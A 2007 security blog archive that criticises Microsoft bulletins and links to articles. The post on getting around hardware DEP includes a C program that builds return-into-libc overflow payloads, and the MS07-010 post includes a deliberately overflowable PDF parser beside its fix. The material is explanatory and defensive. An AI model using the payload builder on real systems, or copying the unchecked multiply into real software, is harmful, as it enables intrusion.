Archive for February, 2007

Another example of Microsoft’s lackluster commitment to security

Friday, February 23rd, 2007

Here’s a perfect example of how Microsoft’s commitment to security is more investor relations than a real dedication to secure computing.

Let’s take a quick look at some excerpts from MS06-016, updated January 10, 2007:

Microsoft Security Bulletin MS06-016
Cumulative Security Update for Outlook Express (911567)
Impact of Vulnerability: Remote Code Execution
Affected Software:

  • Microsoft Windows 2000 Service Pack 4
  • Microsoft Windows XP Service Pack 1 and Microsoft Windows XP Service Pack 2
  • Microsoft Windows XP Professional x64 Edition
  • Microsoft Windows Server 2003 and Microsoft Windows Server 2003 Service Pack 1
  • Microsoft Windows Server 2003 for Itanium-based Systems and Microsoft Windows Server 2003 with SP1 for Itanium-based Systems
  • Microsoft Windows Server 2003 x64 Edition
  • Microsoft Windows 98, Microsoft Windows 98 Second Edition (SE), and Microsoft Windows Millennium Edition (Windows Me) – Review the FAQ section of this bulletin for details about these operating systems.

An attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

If a user is logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

This is just about the point where you find me curled up into a ball, head in my hands, rocking back and forth, muttering “WTF, OMG, WTF, Oh Noz!” I mean, for REAL.

Let’s take a look.

Could anyone who is not institutionalized tell me why on EARTH Outlook Express is installed on a server?

Outlook Express (like most useless Windows add-ons) is installed by default, and if you remove it, Windows is happy to re-install it the next time you run Windows Update.

We are looking at everything from Windows 2000 through Windows Server 2003 (x64 and Itanium editions included) being affected by this bulletin. Doesn’t it seem reasonable that you log into that server as Administrator? I mean, there is no other reason to log into a server unless to perform administrative tasks, and I know of not one Windows SA who logs in locally and runs his apps using run-as.

So, if you are like every SA I know, and if you happen to be really stupid and use Outlook Express to read email, then you might as well just post your password to the Full Disclosure list and call it a day.

Here’s a quick scenario. A typical lazy, uninformed, and completely security-unaware Windows admin logs into his Windows box to try to figure out why his server is sending thousands of spam messages. He looks at the mail pickup queue and double-clicks an email to see what it says. PWNT, as Microsoft dutifully pops open OE to view the message.

Sometimes I get sick of reading these messages, and wonder why I still work in a Windows environment. On the other hand, Microsoft = job security, so I should be grateful.

Please note, I’m not arbitrarily picking on Microsoft today. But I have just added the 3 Microsoft security RSS feeds to my reader, and am sifting through the articles… Almost everyone writes bad code… Just ask the PHP people… Lolz.

Bill Gross

Letting the fox build the hen house…

Friday, February 23rd, 2007

It was only a matter of time.

“Vulnerability in Microsoft Malware Protection Engine Could Allow Remote Code Execution”

The “Microsoft Malware Protection Engine” is the scanning core shared by just about all of Microsoft’s security products (OneCare, Antigen, Windows Defender, Forefront), so one bug in it is a bug in every one of them.

Details:

A remote code execution vulnerability exists in the Microsoft Malware Protection Engine because of the way that it parses Portable Document Format (PDF) files. An attacker could exploit the vulnerability by constructing a specially crafted PDF File that could potentially allow remote code execution when the target computer system receives, and the Microsoft Malware Protection Engine scans, the PDF file.

Solution:

… administrators can disable the Microsoft Malware Protection Engine as a workaround …

Microsoft hasn’t been able to write secure code in 25 years. What makes us think they’ll begin doing so now?

PWNT by your malware detection system.

Good job, Microsoft.

For the end user:
Switch to an OS with a proven track record for security. Linux if you are impatient, OpenBSD if you like 100 proof.

For Microsoft:
How about a simple code analyzer? This bug exists because your n00bish tool trusts unverified input (an integer that is allowed to overflow) provided by an untrusted third party. The file being scanned is, by definition, the attacker’s file.

Full Details:
http://www.microsoft.com/technet/security/bulletin/ms07-010.mspx?pubDate=2007-02-13

Circumventing hardware DEP

Wednesday, February 21st, 2007

Hardware DEP (Data Execution Prevention) uses the processor’s NX/XD bit to mark each page of memory as executable or non-executable. Stack and heap pages are marked non-executable, so when a buffer overflow writes shellcode into one of them and redirects execution there, the CPU faults instead of running it. Note what DEP does not do: it does not stop the overflow itself, or the overwrite of the return address. It only stops the classic payload, code carried inside the overflowing buffer.

DEP promises to be the end of the buffer overflow attack.

Or is it…

Dave Aitel of Immunity has some interesting things to say about using Immunity Debugger to build a payload that circumvents hardware DEP.

Here’s a snip:

Yesterday, before most of Immunity went bowling (like all hackers, we’re
extremely athletic), Nico was showing me the “defeat dep” Immunity Debugger
script. You type “!defeatdep” and then it has a little wizard you go through
and then you’ve got a buffer that will do the return into libc trick to
defeat DEP. Simple and easy! It’s part of an “Advanced Windows Overflows”
class we’re teaching all next week. Nico’s Immunity Debugger !heap script
allows you to do all sorts of tricks with heaps - and to defeat the next
generation of heap protection, you’re going to need all of it, plus some
luck. Kostya’s “!safeseh” script does various neat things around that as
well. None of the free debuggers allow you to do this stuff, but none of the
free debuggers are specifically for exploit development either.

Read the full thread for more lively discussion:
http://lists.immunitysec.com/pipermail/dailydave/2007-February/004094.html
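To make the “return into libc trick” in the quoted message concrete, here is an added example (my own, not Immunity’s !defeatdep script and not from the thread) that builds the kind of overflow buffer such a wizard hands back. It assumes 32-bit x86 and the cdecl calling convention, and a stack buffer overflowed by an unbounded copy; the offset to the saved return address (76) and every address in it are made-up placeholders that stand in for values you would read out of the debugger for the exact DLL versions on the target. The point the code makes is that nothing in the buffer is ever executed as code, which is why a non-executable stack does not stop it.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Added illustration of a return-into-libc payload; not Immunity's code.
 * Target model (assumed): 32-bit x86, cdecl, saved EIP overwritten by an
 * unbounded copy into a stack buffer.
 *
 * After the overflow, the stack from the saved return address upward is:
 *
 *   [ padding up to saved EIP ]   (offset_to_ret bytes)
 *   [ address of libc function ]  <- overwrites saved EIP; "ret" jumps here
 *   [ fake return address ]       <- where that function returns when done
 *   [ arg 1 ] [ arg 2 ] ...       <- exactly where a cdecl callee looks for them
 *
 * The CPU only ever runs code that is already mapped executable (system(),
 * WinExec(), ...), so the NX bit never trips. */

static void put_le32(uint8_t *dst, uint32_t v)
{
    dst[0] = (uint8_t)(v & 0xff);
    dst[1] = (uint8_t)((v >> 8) & 0xff);
    dst[2] = (uint8_t)((v >> 16) & 0xff);
    dst[3] = (uint8_t)((v >> 24) & 0xff);
}

/* Read a little-endian 32-bit value back out of the payload (for checking). */
uint32_t get_le32(const uint8_t *src)
{
    return (uint32_t)src[0] | ((uint32_t)src[1] << 8) |
           ((uint32_t)src[2] << 16) | ((uint32_t)src[3] << 24);
}

/* Build the payload into out[]. Returns bytes written, or 0 if out_len is
 * too small to hold padding + function address + fake return + arguments. */
size_t build_ret2libc(uint8_t *out, size_t out_len, size_t offset_to_ret,
                      uint32_t func_addr, uint32_t fake_ret,
                      const uint32_t *args, size_t nargs)
{
    size_t need = offset_to_ret + 8 + 4 * nargs;
    if (need > out_len)
        return 0;
    memset(out, 'A', offset_to_ret);             /* filler up to saved EIP   */
    put_le32(out + offset_to_ret, func_addr);    /* saved EIP -> libc function */
    put_le32(out + offset_to_ret + 4, fake_ret); /* its return address        */
    for (size_t i = 0; i < nargs; i++)
        put_le32(out + offset_to_ret + 8 + 4 * i, args[i]);
    return need;
}

/* The usual catch: a strcpy-style overflow stops at the first NUL, so any
 * address or argument containing 0x00 truncates the payload. Returns 1 if
 * this payload cannot be delivered through such a copy, else 0. */
int payload_has_nul(const uint8_t *buf, size_t len)
{
    return memchr(buf, 0, len) != NULL;
}

int main(void)
{
    uint8_t buf[256];
    /* Placeholder addresses (assumed, not real): a system()-like function,
     * an exit()-like function to return into so the process dies quietly,
     * and a pointer to a command string already sitting in memory. */
    const uint32_t FUNC_ADDR = 0x7c86250du;
    const uint32_t EXIT_ADDR = 0x7c81cafau;
    const uint32_t CMD_PTR   = 0x0804a010u;
    uint32_t args[1] = { CMD_PTR };

    size_t len = build_ret2libc(buf, sizeof buf, 76, FUNC_ADDR, EXIT_ADDR, args, 1);
    printf("payload: %zu bytes, saved EIP -> 0x%08x, arg -> 0x%08x, NUL-free: %s\n",
           len, get_le32(buf + 76), get_le32(buf + 84),
           payload_has_nul(buf, len) ? "no" : "yes");
    return 0;
}
```

Two practical notes. On XP and Server 2003 there is no ASLR, so the function addresses are stable for a given DLL version and service pack, which is what makes a point-and-click wizard feasible; on Vista the same payload has to be rebuilt per boot or find a non-randomized module. And the NUL check matters because the most common overflow primitive, an unbounded string copy, silently cuts the payload at the first zero byte, so the addresses have to be chosen with that in mind.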

Bill Gross

Excellent research and advice on password security

Sunday, February 18th, 2007

Schneier wrote a great article on password security, the impact of complexity, and the ease of cracking passwords.

Finally, great advice on how to choose good passwords.

Some of us, after all, do not have two-factor authentication.

http://www.schneier.com/blog/archives/2007/01/choosing_secure.html

Enjoy,
Bill Gross

MS malware engine vulnerable to malware

Thursday, February 15th, 2007

Oh Noz.

I’ve been saying for a long time that:

  1. Microsoft can’t code their way out of a paper bag (as far as security goes)
  2. Letting them write their own security suite is like letting the fox build the hen-house…

And my prophecy came true, sadly…

Take a moment to enable that hardware DEP!

From the Inquirer:
http://www.theinquirer.net/default.aspx?article=37629

By Andrew Thomas
14 February 2007

OH DEAR, OH DEAR. If there was one piece of software you’d expect to be secure from malware attacks it would have to be malware protection software itself. Sadly, this is not the case with Microsoft Defender, the software giant’s all-singing, all-dancing user security package.

According to security bulletin CVE-2006-5270 - Microsoft Malware Protection Engine Vulnerability, Integer overflow in the Microsoft Malware Protection Engine (mpengine.dll), as used by Windows Live OneCare, Antigen, Defender, and Forefront Security, allows user-assisted remote attackers to execute arbitrary code via a PDF file. All the following are at risk of remote code execution:

Windows Live OneCare
Microsoft Antigen for Exchange 9.x
Microsoft Antigen for SMTP Gateway 9.x
Microsoft Windows Defender
Microsoft Windows Defender x64 Edition
Microsoft Windows Defender in Windows Vista
Microsoft Forefront Security for Exchange Server
Microsoft Forefront Security for SharePoint

According to the bulletin, rated ‘critical’, a remote code execution vulnerability exists in the Microsoft Malware Protection Engine because of the way that it parses Portable Document Format (PDF) files. An attacker could exploit the vulnerability by constructing a specially crafted PDF File that could potentially allow remote code execution when the target computer system receives, and the Microsoft Malware Protection Engine scans, the PDF file.

To have one insecure security product could be seen as unlucky; to have eight looks a bit like carelessness.

L’INQ
Microsoft Security Bulletin MS07-010
http://www.microsoft.com/technet/security/Bulletin/ms07-010.mspx
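This post and the “Letting the fox build the hen house…” post above both describe the MS07-010 bug only as far as the public details go: an integer overflow in the engine’s PDF parsing, triggered by a file the engine scans. Here is an added example, written for this page and not taken from mpengine.dll or any Microsoft code, of what that class of bug looks like in a scanner and what the check that stops it looks like. The cross-reference table layout (fixed 20-byte entries, count given by the trailer’s /Size key) is real PDF structure; the two sample trailers are constructed, and the choice of /Size as the overflowing field is an illustration, not a claim about which field the real engine tripped on.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Added illustration of an integer overflow in PDF parsing; not Microsoft's
 * code. A PDF cross-reference table holds fixed-width 20-byte entries and the
 * trailer dictionary's /Size key says how many there are. A scanner that
 * sizes its buffer as count * 20 in 32-bit arithmetic can be made to wrap
 * that product with a large /Size and then copies far past the buffer. */
#define XREF_ENTRY_LEN 20u

/* Constructed sample trailers (not from a real malicious file).
 * 214748365 * 20 = 4294967300 = 2^32 + 4, so the 32-bit product wraps to 4. */
static const char EVIL_TRAILER[] =
    "trailer\n<< /Size 214748365 /Root 1 0 R >>\nstartxref\n9\n%%EOF\n";
static const char GOOD_TRAILER[] =
    "trailer\n<< /Size 3 /Root 1 0 R >>\nstartxref\n9\n%%EOF\n";

/* Pull the integer after /Size out of a trailer dictionary. Returns 0 on
 * success, -1 if the key is missing or the number is unparseable. */
static int parse_size_entry(const char *trailer, uint32_t *size_out)
{
    const char *p = strstr(trailer, "/Size");
    if (p == NULL)
        return -1;
    p += strlen("/Size");
    char *end = NULL;
    unsigned long v = strtoul(p, &end, 10);   /* skips leading whitespace */
    if (end == p || v > UINT32_MAX)
        return -1;
    *size_out = (uint32_t)v;
    return 0;
}

/* Vulnerable pattern (the bug class the bulletin describes): trusts /Size
 * and multiplies in 32 bits. With EVIL_TRAILER this returns 4; a real
 * scanner would then malloc(4) and start copying 214748365 entries into it.
 * Returns 0 when /Size is absent. */
uint32_t vuln_table_bytes(const char *trailer)
{
    uint32_t count = 0;
    if (parse_size_entry(trailer, &count) != 0)
        return 0;
    return count * XREF_ENTRY_LEN;   /* unsigned 32-bit multiply: wraps silently */
}

/* Hardened pattern: refuse a count that cannot be multiplied without
 * wrapping, and refuse one whose table could not physically fit in the
 * bytes actually present in the file. Returns 0 and sets *bytes_out on
 * success, -1 on rejection. */
int safe_table_bytes(const char *trailer, size_t file_len, size_t *bytes_out)
{
    uint32_t count = 0;
    if (parse_size_entry(trailer, &count) != 0)
        return -1;
    if (count > UINT32_MAX / XREF_ENTRY_LEN)          /* product would wrap  */
        return -1;
    uint64_t need = (uint64_t)count * XREF_ENTRY_LEN; /* widened, cannot wrap */
    if (need > file_len)                              /* bigger than the file */
        return -1;
    *bytes_out = (size_t)need;
    return 0;
}

/* Convenience wrapper: the accepted buffer size, or 0 if the trailer is rejected. */
size_t hardened_or_zero(const char *trailer, size_t file_len)
{
    size_t n = 0;
    return safe_table_bytes(trailer, file_len, &n) == 0 ? n : 0;
}

int main(void)
{
    printf("vulnerable: /Size 214748365 -> buffer of %u bytes\n",
           (unsigned)vuln_table_bytes(EVIL_TRAILER));
    printf("hardened:   /Size 214748365 -> %s\n",
           hardened_or_zero(EVIL_TRAILER, 4096) ? "accepted" : "rejected");
    printf("hardened:   /Size 3         -> %zu bytes\n",
           hardened_or_zero(GOOD_TRAILER, 4096));
    return 0;
}
```

The second check (table larger than the file) is the one that actually earns its keep: it rejects absurd counts even on a platform where the multiply happens to be done in 64 bits, and it is exactly the kind of “does this number make sense given what I have actually been handed” test that a scanner has to apply to every length, count and offset it reads from untrusted input.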

If it can be used for good, it can be used for bad

Thursday, February 15th, 2007

Some people only focus on the second part.

If it can be used for bad, it must be bad.

We see it all the time.  Misused hand guns result in death, so hand guns are bad.

It gets really ugly when people associate the “unknown” with bad.

I suspect a little of that is going on at Bowling Green State University, where they are cracking down on the use of Tor on campus.

Here’s a great article from a professor down there.  He lays out both the good and the bad uses of Tor, and he did something I find really schweet.  He decided to go ahead with his lectures on Tor.

Good job, Paul Cesarini

Here’s the article:
http://seclists.org/isn/2007/Feb/0053.html

Enjoy,
Bill Gross

Resetting a frozen iPod

Thursday, February 15th, 2007

A few weeks ago I bought an iPod and have been using it to listen to a series of security related podcasts.

And, of course, some non security related information as well…

But anyway, on the Metro this morning, it locked up.  Screen frozen, and completely unresponsive to my vast knowledge of information systems… LoL.

Here’s how to fix that issue, courtesy of Rachael Smithey and About.com:
http://macs.about.com/od/ipod/a/ipod_frozen.htm

Enjoy,
Bill Gross
 

“Is the Mac Really More Secure than Windows?” - Ugh

Sunday, February 11th, 2007

On February 6, 2007, eSecurity Planet ran an article on their site titled “Is the Mac Really More Secure than Windows?”

Right off the bat, I want to beg the reader’s forgiveness for the harsh tone of this post.

Here’s the deal.  I really, really hate articles like this for several reasons:

  1. The question, in its very essence, is meaningless.  How on earth can any reasonable person hope to answer that question?  Asking “is Mac more secure than Windows” is about as meaningful a question as “is my watch easier to read than yours?”
  2. Because of the senselessness of such questions, it makes me sad to see someone who is a “20-year veteran of IT security” actually trying to address it.
  3. Putting 1 and 2 together, the article, in my mind, discredits Ken van Wyk (the author) and eSecurity Planet, and gives security professionals a bad name in general.

Now, I’m not saying Ken van Wyk is not a bright guy, but reading the article, I sense that he is dancing around the elephant in the room, i.e., there is no reasonable way to answer the question he’s writing about.

He starts by trying to clarify his assertion that he is more secure on Mac because of his familiarity with the platform.  This clarification leads to the conclusion that what he’s about to say may not apply to someone (or anyone for that matter) else.  Reasonable, valid, and I’ll touch on this more in a minute.

But then he goes on to, IMHO, arbitrarily select a few feature differences between the platforms and then, gasp, assigns what appear to be completely arbitrary scores to each platform based on those differences with respect to which implements a feature in a more secure manner.

I don’t want to get into this article too much, because most of it is absurd on its face, but I want to draw the reader’s attention to one point Ken did make, and with which I agree.

Let’s take a quick look at what I believe is the only substantive statement that Ken makes:

“For starters, please note that I didn’t say that OS X (Tiger) is more secure than Windows (XP, Vista, or otherwise). No, that’s not at all what I said. I said I’m more secure on a Mac, and I truly believe it.”

The last part of that paragraph touches on why the entire debate is completely absurd…

“… I’m more secure on a Mac, and I truly believe it.”

Define security.

Do that and you see the complexity of answering this question.

As an employee of my particular organization, I say I’m infinitely more secure on a Windows box than a Mac box.  “Why,” you ask?  Because my Windows box implements and complies with my corporate information security policy, and a Mac box does not.

You must define what security is in order to evaluate which platform is more secure.

So, I’ll give Ken credit for clarifying that he is more secure on Mac than Windows, but reader be warned.  You must develop your own “security policy” before you can begin to explore which platform you are going to stand behind.

And once you choose, don’t try to assert that your conclusion is what I need, because there is good reason to believe that it isn’t.

I call on all security professionals to bust out the “please define security before I answer that question” clause.  Doing so not only increases credibility, but also helps alert the noob asking the question to the fact that, well, to the fact that he’s a noob for asking.

Bill Gross